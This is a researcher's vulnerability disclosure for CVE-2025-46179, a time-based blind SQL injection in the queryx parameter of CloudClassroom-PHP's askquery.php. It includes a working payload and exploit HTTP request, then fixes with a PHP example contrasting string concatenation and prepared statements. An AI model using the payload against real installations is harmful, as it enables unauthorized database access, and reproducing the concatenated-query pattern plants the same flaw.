Mdjawadakram

Jun 13th, 2025
🔓 CVE-2025-46179 — SQL Injection in CloudClassroom-PHP v1.0

📢 I'm excited to share that I've been assigned CVE-2025-46179 for a vulnerability I discovered in the open-source CloudClassroom-PHP Project.

---

🛠️ Vulnerability Summary

A SQL Injection vulnerability exists in the askquery.php file of CloudClassroom-PHP v1.0. The vulnerable queryx parameter accepts unsanitized user input, which is directly incorporated into backend SQL queries without validation or parameterization.

---

⚙️ Technical Details

Vulnerable File: askquery.php

Affected Parameter: queryx (via POST)

Database Name Extracted: cc_db

Original Parameter Value: 555

The application fails to sanitize or validate the queryx input, making it vulnerable to time-based blind SQL Injection.

---

🧪 Proof of Concept (PoC)

Payload Used:

5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z

Exploit Request (Sample):

POST /CloudClassroom-PHP-Project-master/askquery.php?id=testing%40example.com HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

addq=Post%20Query!&queryx=5550'XOR(555*if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z

Behavior:

When this payload is submitted, the server delays its response by approximately the number of seconds specified (e.g., 6s or 15s), confirming successful execution of injected SQL commands.

---

🧱 Security Impact

Type: Remote SQL Injection

Impact:

Unauthorized DB access

Data exfiltration/modification

Privilege escalation

Potential code execution depending on DB configuration

---

🛡 Suggested Fixes

Use prepared statements (parameterized queries)

Validate and sanitize all user input

Apply least privilege principles to DB users

Integrate automated code scanning into your CI/CD pipeline
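
The first two fixes applied to a queryx-style field, as an added example; it is not code from this advisory or from CloudClassroom-PHP. The queries table, the buildUnsafeSql and saveQuery helpers, the 2000-byte limit and the in-memory SQLite DSN (chosen so it runs without a database server) are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed stand-in schema: the project's real table and column names are not on the page.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE queries (id INTEGER PRIMARY KEY, email TEXT NOT NULL, body TEXT NOT NULL)');

// BEFORE (the pattern the advisory describes): input concatenated into the statement.
// Hypothetical helper; it only returns the string, which is never executed here.
function buildUnsafeSql(string $email, string $queryx): string
{
    return "INSERT INTO queries (email, body) VALUES ('$email', '$queryx')";
}

// AFTER: validate the shape of each field, then bind the values so the SQL parser
// only ever sees them as data, never as syntax.
function saveQuery(PDO $pdo, string $email, string $queryx): int
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid email');
    }
    $queryx = trim($queryx);
    if ($queryx === '' || strlen($queryx) > 2000) {   // length limit is an assumed policy
        throw new InvalidArgumentException('query text must be 1-2000 bytes');
    }
    $stmt = $pdo->prepare('INSERT INTO queries (email, body) VALUES (:email, :body)');
    $stmt->execute([':email' => $email, ':body' => $queryx]);
    return (int) $pdo->lastInsertId();
}

// Payload string quoted in the advisory, used here as test input for the fixed path.
$payload = "5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z";

// In the concatenated form the first quote in the input closes the string literal early.
echo buildUnsafeSql('testing@example.com', $payload), PHP_EOL;

// In the bound form the same input is stored as an ordinary string.
$id = saveQuery($pdo, 'testing@example.com', $payload);
$check = $pdo->prepare('SELECT body FROM queries WHERE id = ?');
$check->execute([$id]);
var_dump($check->fetchColumn() === $payload);
```

On a MySQL DSN, setting PDO::ATTR_EMULATE_PREPARES to false makes the driver send the statement and the bound values to the server separately.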

---

📚 References

Project GitHub:
https://github.com/mathurvishal/CloudClassroom-PHP-Project

SQL Injection Overview - PortSwigger:
https://portswigger.net/web-security/sql-injection

---

👨‍💻 Discoverer: Muhammad Jawad Akram
CVE ID: CVE-2025-46179

---

If you're using or maintaining CloudClassroom-PHP or any derivative, please audit your use of raw SQL and update your codebase accordingly.